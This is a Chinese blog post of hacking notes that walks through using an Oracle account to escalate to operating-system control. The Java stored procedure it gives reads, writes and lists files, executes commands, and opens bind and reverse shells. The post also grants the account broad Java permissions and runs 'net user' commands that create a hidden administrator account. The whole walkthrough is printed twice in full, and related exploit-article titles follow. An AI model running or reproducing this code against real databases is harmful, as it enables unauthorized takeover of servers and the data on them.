利用Oracle漏洞提权笔记
2008-08-31 13:50
337 查看
1.利用已知的Oracle用户名连上数据库,并创建java提权函数
C:/WINDOWS/system32>sqlplus /nolog
SQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=
10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));
已连接。
SQL>
SQL> create or replace and compile java source named paeq as
2 import java.io.*;
3 import java.net.*;
4 public class PAEQ{
5 public static String listFolder(String path){
6 File f=null;
7 String str="";
8 f=new File(path);
9 String[] files=f.list();
10 if(files!=null)
11 for(int i=0;i<files.length;i++){
12 str+=files[i]+"/r/n";
13 }
14 return str;
15 }
16 public static String saveFile(String filepath,String value){
17 FileOutputStream fos=null;
18 try {
19 fos=new FileOutputStream(filepath);
20 fos.write(value.getBytes());
21 return "OK";
22 } catch (Exception e) {
23 return e.getMessage();
24 } finally{
25 if(fos!=null){
26 try {fos.close();} catch (Exception e) {}
27 }
28 }
29 }
30 public static String readFile(String pathfile,String code){
31 BufferedReader br=null;
32 String value="";
33 try {
34 br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile
),code));
35 String s=null;
36 while((s=br.readLine())!=null){
37 value+=s;
38 }
39 return value;
40 } catch (Exception e) {
41 return e.getMessage();
42 } finally{
43 if(br!=null){try {br.close();} catch (IOException e) {}}
44 }
45 }
46 public static String execFile(String filepath,String code){
47 int i=0;
48 Runtime rt=Runtime.getRuntime();
49 String output="";
50 InputStreamReader isr = null;
51 char[] bufferC=new char[1024];
52 try{
53 Process ps=rt.exec(filepath);
54 isr=new InputStreamReader(ps.getInputStream(),code);
55 while((i=isr.read(bufferC,0,bufferC.length))!=-1){
56 output+=new String(bufferC,0,i);
57 }
58 return output;
59 }catch(Exception e){
60 return e.getMessage();
61 }finally{
62 if(isr!=null)try {isr.close();} catch (IOException e) {}
63 }
64 }
65 public static String bindShell(int port){
66 ServerSocket ss=null;
67 Socket s=null;
68 try {
69 ss = new ServerSocket(port);
70 s=ss.accept();
71 new optShell(ss,s).start();
72
73 return "OK";
74 } catch (Exception e) {
75 return e.getMessage();
76 }
77 }
78 public static String reverseShell(String host,int port){
79 Socket s=null;
80 try{
81 s=new Socket(host,port);
82 new optShell(null,s).start();
83 return "OK";
84 }catch(Exception e){
85 return e.getMessage();
86 }
87 }
88 public static class optShell extends Thread{
89 OutputStream os=null;
90 InputStream is=null;
91 ServerSocket ss;
92 Socket s;
93 public optShell(ServerSocket ss,Socket s){
94 this.ss=ss;
95 this.s=s;
96 try{
97 this.is=s.getInputStream();
98 this.os=s.getOutputStream();
99 }catch(Exception e){
100 if(os!=null)try {os.close();} catch(Exception ex) {}
101 if(is!=null)try {is.close();} catch(Exception ex) {}
102 if(s!=null)try {s.close();} catch(Exception ex) {}
103 if(ss!=null)try {ss.close();} catch(Exception ex) {}
104 }
105 }
106 public void run(){
107 BufferedReader br=new BufferedReader(new InputStreamReader(is));
108 String line="";
109 String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
110 try {
111 //os.write(cmdhelp.getBytes());
112 line=br.readLine();
113 while(!"exit".equals(line)){
114 if(line.length()>3){
115 StringBuffer sb=new StringBuffer(line.trim());
116 String cmd=sb.substring(0, 4);
117 if(cmd.equals("list")){
118 os.write("input you path:/r/n".getBytes());
119 line=br.readLine();
120 os.write(listFolder(line).getBytes());
121 }else if("save".equals(cmd)){
122 os.write("input you filepath:/r/n".getBytes());
123 line=br.readLine();
124 os.write("input you value:/r/n".getBytes());
125 os.write(saveFile(line,br.readLine()).getBytes());
126 }else if("read".equals(cmd)){
127 os.write("input you filepath:/r/n".getBytes());
128 line=br.readLine();
129 os.write("input you code examle:GBK/r/n".getBytes());
130 os.write(readFile(line,br.readLine()).getBytes());
131 }else if("exec".equals(cmd)){
132 os.write("input you run filepath:/r/n".getBytes());
133 line=br.readLine();
134 os.write("input you code examle:GBK/r/n".getBytes());
135 os.write(execFile(line,br.readLine()).getBytes());
136 }else{
137 os.write(cmdhelp.getBytes());
138 }
139 }else{
140 os.write(cmdhelp.getBytes());
141 }
142 line=br.readLine();
143 }
144 } catch (Exception e) {
145 e.printStackTrace();
146 }finally{
147 if(os!=null)try {os.close();} catch(Exception e) {}
148 if(is!=null)try {is.close();} catch(Exception e) {}
149 if(s!=null)try {s.close();} catch(Exception e) {}
150 if(ss!=null)try {ss.close();} catch(Exception e) {}
151 }
152 }
153 }
154 }
155 /
Java 已创建。
SQL> create or replace function PAEQ_LISTFOLDER(str varchar2) return varchar2
2 as language java name 'PAEQ.listFolder(java.lang.String) return java.lang.S
tring';
3 /
函数已创建。
SQL> create or replace function PAEQ_SAVEFILE(p varchar2,v varchar2) return varc
har2
2 as language java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_READFILE(p varchar2,c varchar2) return varc
har2
2 as language java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_EXECFILE(fp varchar2,c varchar2) return var
char2
2 as language java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';/
3 /
警告: 创建的函数带有编译错误。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';
3 /
函数已创建。
2.授予权限
SQL> begin
2 Dbms_Java.Grant_Permission('YSREAL','java.io.FilePermission','c:/WINDOWS/sy
stem32/cmd.exe','read,write,execute,delete');
3 Dbms_Java.Grant_Permission('YSREAL','java.lang.RuntimePermission','*','writ
eFileDescriptor');
4 Dbms_Java.grant_permission('YSREAL','java.net.SocketPermission','*:*','acce
pt,connect,listen,resolve');
5 end;
6 /
PL/SQL 过程已成功完成。
3.添加操作系统用户
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net user ceshi ceshi /
add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETUSERCESHICESHI/ADD','GBK')
--------------------------------------------------------------------------------
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net localgroup Adminis
trators ceshi /add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETLOCALGROUPADMINISTRATORSCESHI/ADD
--------------------------------------------------------------------------------
大功告成,如果系统默认开了远程就可以直接拿用户"ceshi"进行远程连接了。
C:/WINDOWS/system32>sqlplus /nolog
SQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=
10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));
已连接。
SQL>
SQL> create or replace and compile java source named paeq as
2 import java.io.*;
3 import java.net.*;
4 public class PAEQ{
5 public static String listFolder(String path){
6 File f=null;
7 String str="";
8 f=new File(path);
9 String[] files=f.list();
10 if(files!=null)
11 for(int i=0;i<files.length;i++){
12 str+=files[i]+"/r/n";
13 }
14 return str;
15 }
16 public static String saveFile(String filepath,String value){
17 FileOutputStream fos=null;
18 try {
19 fos=new FileOutputStream(filepath);
20 fos.write(value.getBytes());
21 return "OK";
22 } catch (Exception e) {
23 return e.getMessage();
24 } finally{
25 if(fos!=null){
26 try {fos.close();} catch (Exception e) {}
27 }
28 }
29 }
30 public static String readFile(String pathfile,String code){
31 BufferedReader br=null;
32 String value="";
33 try {
34 br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile
),code));
35 String s=null;
36 while((s=br.readLine())!=null){
37 value+=s;
38 }
39 return value;
40 } catch (Exception e) {
41 return e.getMessage();
42 } finally{
43 if(br!=null){try {br.close();} catch (IOException e) {}}
44 }
45 }
46 public static String execFile(String filepath,String code){
47 int i=0;
48 Runtime rt=Runtime.getRuntime();
49 String output="";
50 InputStreamReader isr = null;
51 char[] bufferC=new char[1024];
52 try{
53 Process ps=rt.exec(filepath);
54 isr=new InputStreamReader(ps.getInputStream(),code);
55 while((i=isr.read(bufferC,0,bufferC.length))!=-1){
56 output+=new String(bufferC,0,i);
57 }
58 return output;
59 }catch(Exception e){
60 return e.getMessage();
61 }finally{
62 if(isr!=null)try {isr.close();} catch (IOException e) {}
63 }
64 }
65 public static String bindShell(int port){
66 ServerSocket ss=null;
67 Socket s=null;
68 try {
69 ss = new ServerSocket(port);
70 s=ss.accept();
71 new optShell(ss,s).start();
72
73 return "OK";
74 } catch (Exception e) {
75 return e.getMessage();
76 }
77 }
78 public static String reverseShell(String host,int port){
79 Socket s=null;
80 try{
81 s=new Socket(host,port);
82 new optShell(null,s).start();
83 return "OK";
84 }catch(Exception e){
85 return e.getMessage();
86 }
87 }
88 public static class optShell extends Thread{
89 OutputStream os=null;
90 InputStream is=null;
91 ServerSocket ss;
92 Socket s;
93 public optShell(ServerSocket ss,Socket s){
94 this.ss=ss;
95 this.s=s;
96 try{
97 this.is=s.getInputStream();
98 this.os=s.getOutputStream();
99 }catch(Exception e){
100 if(os!=null)try {os.close();} catch(Exception ex) {}
101 if(is!=null)try {is.close();} catch(Exception ex) {}
102 if(s!=null)try {s.close();} catch(Exception ex) {}
103 if(ss!=null)try {ss.close();} catch(Exception ex) {}
104 }
105 }
106 public void run(){
107 BufferedReader br=new BufferedReader(new InputStreamReader(is));
108 String line="";
109 String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
110 try {
111 //os.write(cmdhelp.getBytes());
112 line=br.readLine();
113 while(!"exit".equals(line)){
114 if(line.length()>3){
115 StringBuffer sb=new StringBuffer(line.trim());
116 String cmd=sb.substring(0, 4);
117 if(cmd.equals("list")){
118 os.write("input you path:/r/n".getBytes());
119 line=br.readLine();
120 os.write(listFolder(line).getBytes());
121 }else if("save".equals(cmd)){
122 os.write("input you filepath:/r/n".getBytes());
123 line=br.readLine();
124 os.write("input you value:/r/n".getBytes());
125 os.write(saveFile(line,br.readLine()).getBytes());
126 }else if("read".equals(cmd)){
127 os.write("input you filepath:/r/n".getBytes());
128 line=br.readLine();
129 os.write("input you code examle:GBK/r/n".getBytes());
130 os.write(readFile(line,br.readLine()).getBytes());
131 }else if("exec".equals(cmd)){
132 os.write("input you run filepath:/r/n".getBytes());
133 line=br.readLine();
134 os.write("input you code examle:GBK/r/n".getBytes());
135 os.write(execFile(line,br.readLine()).getBytes());
136 }else{
137 os.write(cmdhelp.getBytes());
138 }
139 }else{
140 os.write(cmdhelp.getBytes());
141 }
142 line=br.readLine();
143 }
144 } catch (Exception e) {
145 e.printStackTrace();
146 }finally{
147 if(os!=null)try {os.close();} catch(Exception e) {}
148 if(is!=null)try {is.close();} catch(Exception e) {}
149 if(s!=null)try {s.close();} catch(Exception e) {}
150 if(ss!=null)try {ss.close();} catch(Exception e) {}
151 }
152 }
153 }
154 }
155 /
Java 已创建。
SQL> create or replace function PAEQ_LISTFOLDER(str varchar2) return varchar2
2 as language java name 'PAEQ.listFolder(java.lang.String) return java.lang.S
tring';
3 /
函数已创建。
SQL> create or replace function PAEQ_SAVEFILE(p varchar2,v varchar2) return varc
har2
2 as language java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_READFILE(p varchar2,c varchar2) return varc
har2
2 as language java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_EXECFILE(fp varchar2,c varchar2) return var
char2
2 as language java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';/
3 /
警告: 创建的函数带有编译错误。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';
3 /
函数已创建。
2.授予权限
SQL> begin
2 Dbms_Java.Grant_Permission('YSREAL','java.io.FilePermission','c:/WINDOWS/sy
stem32/cmd.exe','read,write,execute,delete');
3 Dbms_Java.Grant_Permission('YSREAL','java.lang.RuntimePermission','*','writ
eFileDescriptor');
4 Dbms_Java.grant_permission('YSREAL','java.net.SocketPermission','*:*','acce
pt,connect,listen,resolve');
5 end;
6 /
PL/SQL 过程已成功完成。
3.添加操作系统用户
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net user ceshi ceshi /
add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETUSERCESHICESHI/ADD','GBK')
--------------------------------------------------------------------------------
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net localgroup Adminis
trators ceshi /add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETLOCALGROUPADMINISTRATORSCESHI/ADD
--------------------------------------------------------------------------------
大功告成,如果系统默认开了远程就可以直接拿用户"ceshi"进行远程连接了。
相关文章推荐
- 关于本地提权的学习笔记(二):注入进程和利用漏洞提权
- Ubuntu 16.04.4 本地提权漏洞(附利用方式及EXP)
- 利用linux漏洞提权
- 【安全牛学习笔记】利用配置不当提权
- [置顶] 安全漏洞--linux 最新内核通用提权漏洞利用示例 (脏牛Dirty COW)
- 输入法漏洞再现Windows 8 利用QQ拼音纯净版实现提权
- 小白日记24:kali渗透测试之提权(四)--利用漏洞提权
- 利用linux漏洞进行提权
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段
- XSS学习笔记(四)-漏洞利用全过程
- 从0到TrustZone(第二篇): QSEE提权漏洞及利用(CVE-2015-6639)
- Oracle 低权限数据库账户得到 OS 访问权限 提权利用
- WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权
- CVE-2017-7269 IIS6.0利用MSF远程溢出漏洞提权
- CVE-2014-7911 Android本地提权漏洞分析与利用
- CVE-2014-0038内核漏洞原理与本地提权利用代码实现分析 作者:seteuid0
- Windows下利用系统漏洞提权
- [原创]WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权
- MS-一些常见本地提权漏洞利用
- PHP 5.x COM functions提权漏洞的利用分析